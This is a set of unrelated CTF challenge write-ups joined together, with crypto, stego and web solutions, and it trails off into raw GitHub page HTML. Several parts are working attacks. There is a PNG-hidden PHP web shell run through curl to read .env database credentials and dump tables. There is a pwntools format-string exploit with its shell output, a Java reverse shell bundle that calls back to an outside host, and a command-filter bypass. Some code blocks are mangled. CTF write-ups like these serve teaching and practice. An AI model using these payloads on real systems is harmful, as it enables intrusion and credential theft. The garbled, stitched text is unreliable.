But, if we only upload PNG and JPEG real files and we can modify .htaccess and bypass editing retrictions from it to add new entries, how can we solve this task and get access to the database ?
After a quick search on internet, we found some documents talking about hardcoding php code inside PNG files that we can execute system commands using HTTP parameters based on this injected code ``
>Reference: https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/
The creator of this technique was really a genious.
We downloaded the existing exploit [xsspng.png](resources/web-1000-unbreakable_uploader/xsspng.png).
Then, we uploaded that PNG file and it was successfull since it was a real PNG file.
We figured out thatwe should change PNG file types using .htaccess so that PNG files will be executed as PHP files.
>Source: https://security.stackexchange.com/a/122937
So, we will use this value as a `target` value
```testAddType application/x-httpd-php .pngAddHandler application/x-httpd-php .png```
It looks great
And also the uploaded PNG image is not displayed as a PNG file
Now, we are going to exploit the RCE using this command
``curl -i -X POST "https://web3.ctfsecurinets.com/uploads/9b3aa7a5c5cebd1318e79442144ffa63/18abe44ac4242278ad0e6448370067d5.png?0=shell_exec" -d "1=id"``
And we got a nice result
Now, let's find out the database credentials a step by step.
We get the current location
``curl -i -X POST "https://web3.ctfsecurinets.com/uploads/9b3aa7a5c5cebd1318e79442144ffa63/18abe44ac4242278ad0e6448370067d5.png?0=shell_exec" -d "1=pwd"``
So this is a Symfony project. A quick search on google gives up where we can find the database credentials from configuration files.
If the `.env` file exists, if should be there. Otherwise it should be on `app/config/parameters.yml`.
So let's check the project document root
``curl -i -X POST "https://web3.ctfsecurinets.com/uploads/9b3aa7a5c5cebd1318e79442144ffa63/18abe44ac4242278ad0e6448370067d5.png?0=shell_exec" -d "1=ls ../../../ -lA"``
`.env` file exists. So let's cat it
``curl -X POST "https://web3.ctfsecurinets.com/uploads/9b3aa7a5c5cebd1318e79442144ffa63/18abe44ac4242278ad0e6448370067d5.png?0=shell_exec" -d "1=cat ../../../.env"``
So we got:
```Mysql DatabaseHostname: localhostUsername: symfony_adminPassword: Securinets_dB_P455W0Rd_369Database: symfony_task_3```
In this task, mysqldump will not work. Maybe because of the database that was very big or because of user privileges. So we need to searh the flag inside the database step by step.
Let's show database tables:
```curl -X POST "https://web3.ctfsecurinets.com/uploads/9b3aa7a5c5cebd1318e79442144ffa63/18abe44ac4242278ad0e6448370067d5.png?0=shell_exec" -d "1=mysql -usymfony_admin -pSecurinets_dB_P455W0Rd_369 -hlocalhost --database symfony_task_3 -e 'show tables'"```
But this strangely will not work.
We tried to go back and retrieve database names maybe we did something wrong
```curl -X POST "https://web3.ctfsecurinets.com/uploads/9b3aa7a5c5cebd1318e79442144ffa63/18abe44ac4242278ad0e6448370067d5.png?0=shell_exec" -d "1=mysql -usymfony_admin -pSecurinets_dB_P455W0Rd_369 -hlocalhost -e 'show databases'"```
Clear Output:
```Databasebig_databaseinformation_schema```
So the database name that we found on the configuration file `symfony_task_3` was a fake name and instead we should use `big_database`.
Let's list its tables
```curl -X POST "https://web3.ctfsecurinets.com/uploads/9b3aa7a5c5cebd1318e79442144ffa63/18abe44ac4242278ad0e6448370067d5.png?0=shell_exec" -d "1=mysql -usymfony_admin -pSecurinets_dB_P455W0Rd_369 -hlocalhost --database big_database -e 'show tables'"```
Clear output:
```Tables_in_big_databaseuser_details```
And finally we search the flag on that `user_details` table
```curl -X POST "https://web3.ctfsecurinets.com/uploads/9b3aa7a5c5cebd1318e79442144ffa63/18abe44ac4242278ad0e64d5.png?0=shell_exec" -d "1=mysql -usymfony_admin -pSecurinets_dB_P455W0Rd_369 -hlocalhost --database big_database -e 'select * from user_details' | grep Securinets"```
Clear output:
```69069 paul47 brown morris fl46 Securinets{T00_MuCh_W0rk} 1```
So, the flag is `Securinets{T00_MuCh_W0rk}`.
___
# Scoreboard
This is the tasks list released on the CTF:
And, this is the scoreboard and the rankin for the 100/436 teams that they solved at least one task in this CTF :
If you need the Json file of the scoreboard, you can find it [here](scoreboard/score.json)
|
The binary has a simple Stack Overflow vulnerability.We need to return to `__lib_csu_init` because RDX is set to zero before we get RIP control.
[writeup](https://ptr-yudai.hatenablog.com/entry/2019/03/25/152043#Pwn-975pts-Baby-one) |
The binary has a simple Stack Overflow vulnerability.We can't leak the memory because there is no `write` function in the GOT.Also, we can't overwrite the return address because of the calling convention.By applying the Stack Pivot and the Return to dl-resolve, we can call `system("/bin/sh")`.
[writeup](https://ptr-yudai.hatenablog.com/entry/2019/03/25/152043#Pwn-1000pts-Baby-two) |
tl;dr:1. Notice output depends only on 2 bits of the state, and after some shifts one of them is known2. Ask Z3 to solve the correspondence
https://github.com/p4-team/ctf/tree/master/2019-03-23-0ctf-quals/crypto_lfsr |
babysponge==========
Category: Crypto
297 points
27 solves
Task----
We are given an implementation of a Keccak-type hashing algorithm and are asked to find two messages whose hashes are the same.
Solution--------
In case you have never heard of the sponge construction you should read [this article](https://en.wikipedia.org/wiki/Sponge_function). I will use the following image for reference throughout this article as it will make explaining the solution much easier:
The only important part of the given Keccak implementation is the following function:
```pythondef Keccak(rate, capacity, inputBytes, delimitedSuffix, outputByteLen): outputBytes = bytearray() state = bytearray([0 for i in range(200)]) rateInBytes = rate//8 blockSize = 0 if (((rate + capacity) != 1600) or ((rate % 8) != 0)): return inputOffset = 0 # === Absorb all the input blocks === while(inputOffset < len(inputBytes)): blockSize = min(len(inputBytes)-inputOffset, rateInBytes) for i in range(blockSize): state[i] = state[i] ^ inputBytes[i+inputOffset] inputOffset = inputOffset + blockSize if (blockSize == rateInBytes): state = KeccakF1600(state) blockSize = 0 # === Do the padding and switch to the squeezing phase === state[blockSize] = state[blockSize] ^ delimitedSuffix if (((delimitedSuffix & 0x80) != 0) and (blockSize == (rateInBytes-1))): state = KeccakF1600(state) state[rateInBytes-1] = state[rateInBytes-1] ^ 0x80 state = KeccakF1600(state) # === Squeeze out all the output blocks === return state[:outputByteLen] while(outputByteLen > 0): blockSize = min(outputByteLen, rateInBytes) outputBytes = outputBytes + state[0:blockSize] outputByteLen = outputByteLen - blockSize if (outputByteLen > 0): state = KeccakF1600(state) return outputBytes```
As you can see, every block of input is processed in the while loop. First, the first r bits of a state are xored with the current block of input, then the whole state (r + c bits) go through the KeccakF1600 function (labeled as f on our reference image). The way this function works is not important in case of this task so it's no use to read its source code. The only thing we should know is that it takes the entire state and outputs a new state and that it's independent of the input and round number.
The source code also provides some declarations of commonly used hashing algorithms in this section:
```pythondef SHAKE128(inputBytes, outputByteLen): return Keccak(1344, 256, inputBytes, 0x1F, outputByteLen)
def SHAKE256(inputBytes, outputByteLen): return Keccak(1088, 512, inputBytes, 0x1F, outputByteLen)
def SHA3_224(inputBytes): return Keccak(1152, 448, inputBytes, 0x06, 224//8)
def SHA3_256(inputBytes): return Keccak(1088, 512, inputBytes, 0x06, 256//8)
def SHA3_384(inputBytes): return Keccak(832, 768, inputBytes, 0x06, 384//8)
def SHA3_512(inputBytes): return Keccak(576, 1024, inputBytes, 0x06, 512//8)```
And they turn out to be a pretty good hint to solving the challenge. Take a good look at them and then compare them to the actual function used in our task: ```CompactFIPS202.Keccak(1552, 48, bytearray(msg), 0x06, 32)```. You can notice that the second argument corresponding to the capacity value (denoted c in the reference picture) is very small.
The simplest way to find a hash collision is to simply generate random messages and insert their hashes into a dictionary-like data structure until you stumble across a hash that was previously generated. When the hash value is n bits long then the approximate amount of messages you have to generate to find a collision is about ```2^(n/2)``` and that's due to the birthday paradox - in brief, having generated ```2^(n/2)``` messages, you have ```(2^(n/2))^2 = 2^n``` pairs of hashes and each pair has a ```1/2^n``` probability to have the exact same hash value, therefore with high probability you should have at least one pair with colliding hashes.
However our hash is 32 bytes = 256 bits long, so that is certainly too long to try to find a collision this way. But we know that the capacity of our sponge construction is relatively small. Let's look at the state of our hash right before entering the squeezing phase (look at the picture for the reference). If both our messages have the same state in this point, then their final hashes will also end up the same. Now imagine that we have two messages with the length of r bits that have the exact same last c bits of the state right before the squeezing phase. If we were to extend both of them by another block of input, both of them will first be xored with the new block and then run once more throught the f function. But we know that their last c bits are the same and we can easily calculate the xor of the first r bits of their states. If we were to append block full of zeros to the first message and block equal to this xor to the second message then their state right before going through the f function will be the same and therefore their final hashes will also be the same!
This means that we can now run a very simple attack: generate random 194 byte messages and calculate last c bits of their hash state right before the squeezing phase. After finding two messages with the colliding last c bits of the states, calculate the xor of first the r bits of their states. Append 194 null bytes to the first message and calculated xor to the second message. The resulting two messages should give the exact same hash values.
First of all we have to make some minor changes to the Keccak function in order for our attack to work properly: we must return the state right after the while loop ends and also we must return the full state array, not only first r bits as in the original implementation. The cracking script I've written in python can be found in the ```solver.py``` file, but it turned out to be extremely slow - after 3 hours of running it calculated only 5 million hashes (out of approximately 16 million required) and then it crashed with a memory error. I was therefore forced to implement my own Keccak algorithm in C++, which can be found in the ```solver.cpp``` file.
The C++ program was running for around 10 minutes when it found the collision on last c bits. All I had to do then was to copy both messages and paste them into the python solver script in place of the collision searching part. The final two messages with the same hashes were:
```0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000c2d5850000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010a090e7e5ab3ebe5dfff38db8def275aea4e4faa4640b98f4dce9b7df173a1c41b8b08c65c2276d08ce5b8ee9984e90941038a5a379fbeb074d3af8d1f72a0203b8c4932a103d1da506d159b08bfa20b766b379257032bd1acb7b559a3562edc1781d190873afe80182e5d591e32088c9d7facf45fbe71d8dc702287eb6916f7b008c4527cc14ef8d53ff579435bad9266e7d3b4d1a329aec6e243305059fa2a81bdad01a7a4d67cd154ea039da461030ae4aaf1eea5b580771a5e76da8afd7a39a61f72b5```
Passing them to the netcat server gave us a flag!
```flag{I_wAs_th3_sh4d0w_Of_the_waXwing_sLAin__By_the_fAlse_@4zure9_in_the_window_pan3}``` |
### === Simple (Pwn: 12 solves, 998 pts) ===by mito
1. This binary has format string bug(FSB) vulnerability.2. I can use FSB only once.3. First, I leak the libc address and stack address, and overwrite GOT address of perror function to addres of main function using FSB at once.4. Second, I overwrite the return address of the main function to the address of one-gadgets using FSB.5. Third, I restored the perror() address using FSB.6. The OS version of the server is the same ubuntu16.04 as local.
```from pwn import *
#context(os='linux', arch='amd64')context.log_level = 'debug'
BINARY = './simple'elf = ELF(BINARY)
perror_got = elf.got['perror']read_got = elf.got['read']main_addr = 0x4006a6 # objdump -d simple
if len(sys.argv) > 1 and sys.argv[1] == 'r': HOST = "51.254.114.246" PORT = 4444 s = remote(HOST, PORT) libc = elf.libc #libc = ELF("./libc-2.23.so")else: s = process(BINARY) libc = elf.libc
buf = "%14$p%10$s%1682c%9$hn"buf += "_" * (24-len(buf))buf += p64(perror_got)buf += p64(read_got)#pause()s.send(buf)
r = s.recv(20)
frame_addr = int(r[0:14], 16)return_addr = frame_addr - 0xd8
read_addr = u64(r[14:20]+'\x00\x00')libc_base = read_addr - libc.symbols['read']one_gadget = libc_base + 0x45216
print "frame_addr =", hex(frame_addr)print "return_addr =", hex(return_addr)print "read_addr =", hex(read_addr)print "libc_base =", hex(libc_base)print "one_gadget =", hex(one_gadget)
a0 = one_gadget & 0xffffa1 = ((one_gadget & 0xffff0000) >> 16)a1 = (a1 - a0 - 1) % 0x10000 + 1
buf = "%%%dc%%%d$hn" % (a0, 10)buf += "%%%dc%%%d$hn" % (a1, 11)buf += "_" * (32-len(buf))buf += p64(return_addr)buf += p64(return_addr+2)s.sendline(buf)
buf = "%1430c%8$hn"buf += "_" * (16-len(buf))buf += p64(perror_got)#pause()s.sendline(buf)
s.interactive()```
```$ python solve.py r
[DEBUG] Sent 0x3 bytes: 'id\n'[DEBUG] Received 0x36 bytes: 'uid=1021(simple) gid=1021(simple) groups=1021(simple)\n'uid=1021(simple) gid=1021(simple) groups=1021(simple)$ cat flag.txt[DEBUG] Sent 0xd bytes: 'cat flag.txt\n'[DEBUG] Received 0x2a bytes: 'securinets{format_string_rule_the_world!}\n'securinets{format_string_rule_the_world!}``` |
TL;DR: We have a binary executable for custom virtual machine, and IDA processor module for this VM. By reverse engineering processor module we can recover information about VM instruction set. After that, we reverse engineer the binary and conclude that we need to run it somehow to get a flag. Since used algorithms are very inefficient, we reimplement binary logic in some programming language while performing optimizations and run the code to get a flag. |
# Ghost pepper (web, 125p, 78 solved)
In the challenge we get a link to webpage which requests Basic Auth from us.As a hint the page says `karaf`.
Karaf is OSGi provider, and coincidentally the default user/password for the web interface is `karaf:karaf`.
Now that we passed the authentication, we try to look around, but everything returns 404.
We guessed that maybe the challenge name is some kind of hint.Ghost pepper is otherwise known as `jolokia`, and this happens to be a name of Java JMX-over-HTTP service.
We confirmed this by checking `/jolokia` endpoint, which returned some data.
Exposing JMX is usually a bad idea because it's always at least some infoleak.Here we've got OSGi running there as well, and it seems there were some JMX Managed Beans from Karaf exposed as well.
OSGi is a Java platform which allows managing lifecycle of application components at runtime, without the need to restart the app.You can add/remove/substitute a component at runtime, deploy multiple versions etc, all while the app is running.
From our perspective there is one particularly intersting operation -> installing and starting a new component.
We can list all beans and operations they provide at `/jolokia/list`.
JMX Bean `org.apache.karaf:name=root,type=bundle` provides `install(java.lang.String, boolean)` operation, where the first argument is URL for the JAR file containing the component, and boolean specifies if it should be automatically started.
We can run this with:
```javapublic static void main(String[] args) throws Exception { J4pClient j4pClient = J4pClient.url("http://111.186.63.207:31337/jolokia/").user("karaf").password("karaf").build(); J4pExecRequest req = new J4pExecRequest("org.apache.karaf:name=root,type=bundle", "install(java.lang.String, boolean)", "http://our.url/helloworld-1.0.0.jar", true); J4pExecResponse resp = j4pClient.execute(req); System.out.println(resp.getValue().toString());}```
Now if we provide some interesting component to run, we should get a nice RCE.We went ahead with some stolen and modified Java Reverse Shell in OSGi bundle format:
```javapublic class Activator implements BundleActivator {
public void start(BundleContext context) { try { try { String host = "our.ip"; int port = 80; Socket s = new Socket(host, port); String cmd = "/bin/sh"; Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start(); InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream(); OutputStream po = p.getOutputStream(), so = s.getOutputStream(); while (!s.isClosed()) { while (pi.available() > 0) so.write(pi.read()); while (pe.available() > 0) so.write(pe.read()); while (si.available() > 0) po.write(si.read()); so.flush(); po.flush(); Thread.sleep(50); } p.destroy(); s.close(); } catch (Exception e) { e.printStackTrace(); } } catch (Exception e) {
} }
public void stop(BundleContext context) { System.out.println("Goodbye World!"); }
}```
One tricky part was that we initially used some random port number, and it didn't work.We were afraid there is some mitigation in place and we'll need to exfiltrate the flag blindly somehow.But we realised that they did download the bundle, so at least 80 and 8080 ports are not blacklisted.
Once we get a reverse shell we can read the flag: `flag{DOYOULOVEJOLOKIA?ILOVEITVERYMUCH}` |
* we can't read the regular flag file (/bin/cat /home/welcome/flag.txt) * cause we got black list that contains the words(flag,txt,cat...)* soo we can bypass the check by write ca't' that is equal to cat :)### The Solotion1. ./wrapper1. /bin/ca't' /home/welcome/fla'g'.tx't'
### flagsecurinets{who_needs_exec_flag_when_you_have_linker_reloaded_last_time!!!?} |
# Securinets Prequals CTF 2019 – EZ
* **Category:** Misc* **Points:** 331
## Challenge
> Welcome to Securinets, this one is an easy one.>> Please make sure you hash the WORD with sha1 (lowercase hash letter)>> The final flag is : Securinets{the_hash_of_the_word}>> [pic.png](https://github.com/m3ssap0/CTF-Writeups/raw/master/Securinets%20Prequals%20CTF%202019/EZ/pic.png)>> Author:BlueWhale
## Solution
The challenge gives the following PNG file to analyze.
One of the basic techniques of steganography is to hide information into MSB or LSB of an image.
[SHIT - Stego Helper Identification Tool](https://github.com/qll/shit) is a tool which allows to retrieve that information.
Launching the tool with the following command
```python retrieve.py bit 7 pic.png ```
will retrieve the following text.
```--START--"The fact is that upon his entrance I had instantly recognized the extremepersonal danger in which I lay. The only conceivable escape for him lay in silencingmy tongue. In an instant I had slipped the revolver from the drawer into mypocket and was covering him through the cloth. At his remark I drew the weaponout and laid it cocked upon the table. He still smiled and blinked, but there wassomething about his eyes which made me feel very glad that I had it there,"You evidently don't know me,' said he."'On the contrary,' I answered, 'I think it is fairly evident that I do. Pray takea chair. I can spare you five minutes if you have anything to say.'"'All that I have to say has already crossed your mind,' said he."'Then possibly my answer has crossed yours,' I replied."'You stand fast?'"'Absolutely.'"He clapped his hand into his pocket, and I raised the pistol from the table.But he merely drew out a <DETELED_WORD> in which he had scribbled somedates."You crossed my path on the fourth of January,' said he. 'On the twenty-thirdyou incommoded me; by the middle of February I was seriously inconveniencedby you; at the end of March I was absolutely hampered in my plans; and now, atthe close of April, I find myself placed in such a position through your continualpersecution that I am in positive danger of losing my liberty. The situation isbecoming an impossible one.'"'Have you any suggestion to make?' I asked."'You must drop it, Mr. Holmes,' said he, swaying his face about. 'You reallymust, you know.'"--END--;```
In that text there is a `<DETELED_WORD>`. Googling the text, you can discover that the deleted word is: `memorandum-book`.
The SHA-1 hash of that word is: `b47f0d2a8866a75696f94a515d0cdf54c7ea3174`.
Hence the flag is the following.
```Securinets{b47f0d2a8866a75696f94a515d0cdf54c7ea3174}``` |
# CONFidence CTF Teaser 2019 – My admin panel
* **Category:** web, warmup* **Points:** 51
## Challenge
> I think I've found something interesting, but I'm not really a PHP expert. Do you think it's exploitable?>> https://gameserver.zajebistyc.tf/admin/
## Solution
The website has directory listing active, connecting to it two files are listed:* `login.php`* `login.php.bak`
The first page prints the message: `Not authenticated.`.
The [second file](https://raw.githubusercontent.com/m3ssap0/CTF-Writeups/master/CONFidence%20CTF%20Teaser%202019/My%20admin%20panel/login.php.bak) contains the PHP source code.
```php {}".format(err.code) break
```
With the cookie `otadmin={"hash": 389}` you will discover the flag.
```p4{wtf_php_comparisons_how_do_they_work}``` |
# Pragyan CTF 2019 "Decode This" writeup
This problem is solved by hi120ki.
## check problem
```Ram has something to show you, which can be of great help. It definitely contains the piece of text "pctf" and whatever follows it is the flag. Can you figure out what it is?
Note: Enclose it in pctf{}```
There is "pctf" character in secret.txt.
> 「pctf」が secret.txt の中のどこかにあるそうです。
```pythonimport random
file = open("secret.txt","r")secret = file.read()
# convert flag to only alphabetsflag = ""for i in secret: if i.isalpha(): flag += il = len(flag)
# generate random numberkey = [[int(random.random()*10000) for e in range(2)] for e in range(2)]
i = 0ciphertext = ""
while i <= (l-2): # x and y is 0..25 x = ord(flag[i]) - 97 y = ord(flag[i+1]) - 97 z = (x*key[0][0] + y*key[0][1])%26 + 97 w = (x*key[1][0] + y*key[1][1])%26 + 97 ciphertext = ciphertext + chr(z) + chr(w) i = i+2
cipherfile = open('ciphertext.txt','w')cipherfile.write(ciphertext)```
Flag is converted to only alphabets.
This crypto is called Affin cipher.
<https://en.wikipedia.org/wiki/Affine_cipher>
But this code has some difference.
> flag 文字列はアルファベットのみ取り出されています。>> これはアフィン暗号とも呼ばれますが少しカスタマイズされています。
## solve problem
First, key can be thought as key%26.
> まず key は定数であり、mod26 を取り、0 から 25 のどれかの値として考えることができます。
```pythona = key[0][0]%26 # a is 0..25b = key[0][1]%26 # b is 0..25c = key[1][0]%26 # c is 0..25d = key[1][1]%26 # d is 0..25```
Second, There is "pctf" character in secret.txt.
I try all key, and encrypt "pctf", and make sure ciphertext matches.
If it maches, I decode all ciphertext.
> 次に secret.txt の中に「pctf」が含まれていることから、まず全ての key で pctf を暗号化し、ciphertext と一致するか調べます。>> そしてもし一致する部分がある場合、その key を使って ciphertext を復号化します。
```pythoncipher_txt = open("ciphertext.txt").read()cipher_num = []
for i in range(72): cipher_num.append(ord(cipher_txt[i]) - 97)
p_num = ord("p") - 97c_num = ord("c") - 97t_num = ord("t") - 97f_num = ord("f") - 97
# try all keyfor a in range(26): for b in range(26): for c in range(26): for d in range(26): for i in range(34): # make sure ciphertext matches res1 = (a * p_num + b * c_num) % 26 res2 = (c * p_num + d * c_num) % 26 res3 = (a * t_num + b * f_num) % 26 res4 = (c * t_num + d * f_num) % 26 if ( (cipher_num[i * 2] == res1) and (cipher_num[i * 2 + 1] == res2) and (cipher_num[i * 2 + 2] == res3) and (cipher_num[i * 2 + 3] == res4) ): print("\nkey is", a, b, c, d) # decode all ciphertext for item in range(36): for x in range(26): for y in range(26): if ( (cipher_num[item * 2] == (a * x + b * y) % 26) and (cipher_num[item * 2 + 1] == (c * x + d * y) % 26) ): print(chr(x + 97), chr(y + 97), end=" ")
# key is 15 10 18 17# r a m h a s a l i t t l e s e c r e t f o r y o u r i g h t h e r e i t i s p c t f i l i k e c l i m b i n g h i l l s w h a t a b o u t y o u```
Ram has a little secret for you right here it is pctf i like climbing hills what about you
I get flag : pctf{ilikeclimbinghillswhataboutyou} |
<html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system"> <head> <meta charset="utf-8"> <link rel="dns-prefetch" href="https://github.githubassets.com"> <link rel="dns-prefetch" href="https://avatars.githubusercontent.com"> <link rel="dns-prefetch" href="https://github-cloud.s3.amazonaws.com"> <link rel="dns-prefetch" href="https://user-images.githubusercontent.com/"> <link rel="preconnect" href="https://github.githubassets.com" crossorigin> <link rel="preconnect" href="https://avatars.githubusercontent.com">
<link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/light-fe3f886b577a.css" /><link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/dark-a1dbeda2886c.css" /><link data-color-theme="dark_dimmed" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_dimmed-1ad5cf51dfeb.css" /><link data-color-theme="dark_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_high_contrast-11d3505dc06a.css" /><link data-color-theme="dark_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-8b800495504f.css" /><link data-color-theme="light_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_colorblind-daa38c88b795.css" /><link data-color-theme="light_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_high_contrast-1b9ea565820a.css" /><link data-color-theme="light_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_tritanopia-e4be9332dd6c.css" /><link data-color-theme="dark_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_tritanopia-0dcf95848dd5.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/primer-c581c4e461bb.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/global-0e278d45156f.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/github-dcaf0f44dbb1.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/code-26709f54a08d.css" />
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/wp-runtime-774bfe5ae983.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_stacktrace-parser_dist_stack-trace-parser_esm_js-node_modules_github_bro-327bbf-0aaeb22dd2a5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/ui_packages_soft-nav_soft-nav_ts-21fc7a4a0e8f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/environment-e059fd03252f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_selector-observer_dist_index_esm_js-2646a2c533e3.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_details-dialog-elemen-63debe-c04540d458d4.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_relative-time-element_dist_index_js-b9368a9cb79e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_fzy_js_index_js-node_modules_github_markdown-toolbar-element_dist_index_js-e3de700a4c9d.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_auto-complete-element_dist_index_js-node_modules_github_catalyst_-6afc16-e779583c369f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_text-ex-3415a8-7ecc10fb88d0.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-79182d-befd2b2f5880.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_view-components_app_components_primer_primer_js-node_modules_gith-6a1af4-df3bc95b06d3.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/github-elements-fc0e0b89822a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/element-registry-1641411db24a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_lit-html_lit-html_js-9d9fe1859ce5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_manuelpuyol_turbo_dist_turbo_es2017-esm_js-4140d67f0cc2.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_github_alive-client_dist-bf5aa2-424aa982deef.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-node_modules_github_hotkey_dist_-9fc4f4-d434ddaf3207.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_color-convert_index_js-35b3ae68c408.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_github_session-resume_dist-def857-2a32d97c93c5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_paste-markdown_dist_index_esm_js-node_modules_github_quote-select-15ddcc-1512e06cfee0.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_updatable-content_ts-430cacb5f7df.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_keyboard-shortcuts-helper_ts-app_assets_modules_github_be-f5afdb-8dd5f026c5b9.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_sticky-scroll-into-view_ts-0af96d15a250.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_include-fragment_ts-app_assets_modules_github_behaviors_r-4077b4-75370d1c1705.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_behaviors_ht-83c235-7883159efa9e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/behaviors-742151da9690.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js-06ff531-32d7d1e94817.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/notifications-global-f5b58d24780b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_morphdom_dist_morphdom-esm_js-node_modules_github_template-parts_lib_index_js-58417dae193c.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_virtualized-list_es_index_js-node_modules_github_memoize_dist_esm_index_js-8496b7c4b809.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-70450e-0370b887db62.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_ref-selector_ts-7bdefeb88a1a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/codespaces-d1ede1f1114e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_mini-throt-a33094-b03defd3289b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_mini-th-85225b-226fc85f9b72.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" 